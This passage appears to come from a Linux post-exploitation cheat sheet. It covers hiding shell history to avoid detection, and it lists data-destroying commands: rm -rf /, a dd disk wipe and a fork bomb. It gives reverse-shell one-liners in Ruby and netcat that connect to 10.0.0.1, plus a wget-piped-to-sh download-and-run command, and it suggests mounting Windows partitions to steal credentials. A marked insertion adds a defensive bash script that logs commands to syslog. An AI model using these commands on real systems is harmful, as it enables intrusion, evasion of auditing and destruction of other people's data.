Also, check http://incolumitas.com/wp-content/uploads/2012/12/blackhats_view.pdf for some one-liners that find world-writable directories/files and more.
Covering Your Tracks
Avoiding history files
export HISTFILE= or
This next one might not be a good idea, because a lot of folks know to check for tampering with this file, and will be suspicious if they find out.
However, if you happen to be on an account that was originally inaccessible and the .bash_history file is available (ls -a ~), cat'ing its contents can provide a good deal of information about the system and its most recent updates/changes.
clear all history in RAM
Note that you're probably better off modifying or temporarily disabling history files rather than deleting them: it leaves far fewer traces and is less suspicious.
In some cases HISTFILE and HISTFILESIZE are made read-only; get around this by explicitly clearing history (history -c) or by kill -9 $$'ing the shell. Sometimes the shell can be configured to run 'history -w' after every command; get around this by overriding 'history' with a no-op shell function. None of this will help if the shell is configured to log everything to syslog, however.
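The defender-side counterpart to the bypasses listed above, as an added example that is not part of the original page: pin the history variables read-only and ship every command to syslog from PROMPT_COMMAND, so clearing the shell's own history or killing the shell does not remove the record. The install path, the bash_audit tag and the audit line format are assumptions.

```shell
# Defender-side hardening for interactive bash; assumed to be installed as
# /etc/profile.d/audit.sh (path, tag and line format are assumptions).

# 1. Pin the history variables so "export HISTFILE=" and "HISTFILESIZE=0"
#    are refused with "readonly variable" instead of taking effect.
readonly HISTFILE="${HOME:-/root}/.bash_history"
readonly HISTSIZE=100000
readonly HISTFILESIZE=100000

# 2. Build one single-line audit record for a command. Embedded newlines are
#    flattened so a multi-line command cannot forge a second log record.
audit_line() {
    # $1 = user, $2 = shell pid, $3 = tty, $4 = raw command text
    printf 'user=%s pid=%s tty=%s cmd=%s' "$1" "$2" "$3" \
        "$(printf '%s' "$4" | tr '\n' ' ')"
}

# 3. Ship the most recent history entry to syslog. The record lives in
#    syslog (ideally forwarded off-host), so "history -c", a no-op history()
#    function, or "kill -9 $$" on the shell do not remove it.
ship_last_cmd() {
    last=$(fc -ln -1 2>/dev/null | sed 's/^[[:space:]]*//')
    [ -n "$last" ] || return 0
    logger -p auth.info -t bash_audit \
        "$(audit_line "$(id -un)" "$$" "$(tty 2>/dev/null)" "$last")"
}

# 4. Run the shipper before every prompt and make the hook itself read-only
#    so it cannot simply be unset; in bash the functions can be pinned too.
readonly PROMPT_COMMAND='ship_last_cmd'
if [ -n "${BASH_VERSION:-}" ]; then
    readonly -f audit_line ship_last_cmd
fi
```

A user who execs a different shell, or who already has root to edit the profile, still evades this, so treat it as a baseline on top of auditd execve logging and off-host syslog forwarding rather than a replacement for them.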
Deleting and Destroying
Commands for when it is necessary to leave the machine inaccessible or unusable. Note that this tends to be quite evident (as opposed to a simple exploitation that might go unnoticed for some time, even forever), and will most surely get you into trouble. Oh, and you're probably a jerk if you use any of the stuff below.
Command / Description and/or Reason
rm -rf /
  Recursively tries to delete all files
(command not preserved in this copy)
  Reformat the device mentioned, making recovery of files hard
dd if=/dev/zero of=/dev/sda bs=1M
  Overwrite disk /dev/sda with zeros
(hex blob not preserved in this copy)
  Hex version of rm -rf / (How is this supposed to work?)
Fork Bomb: The [in]famous “fork bomb”. This command will cause your system to run a large number of processes, until it “hangs”. This can often lead to data loss (e.g. if the user brutally reboots, or the OOM killer kills a process with unsaved work). If left alone for enough time a system can eventually recover from a fork bomb.
ruby -rsocket -e 'f=TCPSocket.open("10.0.0.1",1234).to_i; exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'
nc -e /bin/sh 10.0.0.1 1234 # note: needs -l on some versions, and many versions do NOT support -e anymore
wget http://server/file.sh -O- | sh
This command downloads a file and immediately executes it.
Fun if Windows is present and accessible
If Windows is installed and the logged-in user's access level covers the Windows partitions, an attacker can mount them and do much deeper information gathering, credential theft and rooting. ntfs-3g is useful for mounting NTFS partitions read-write.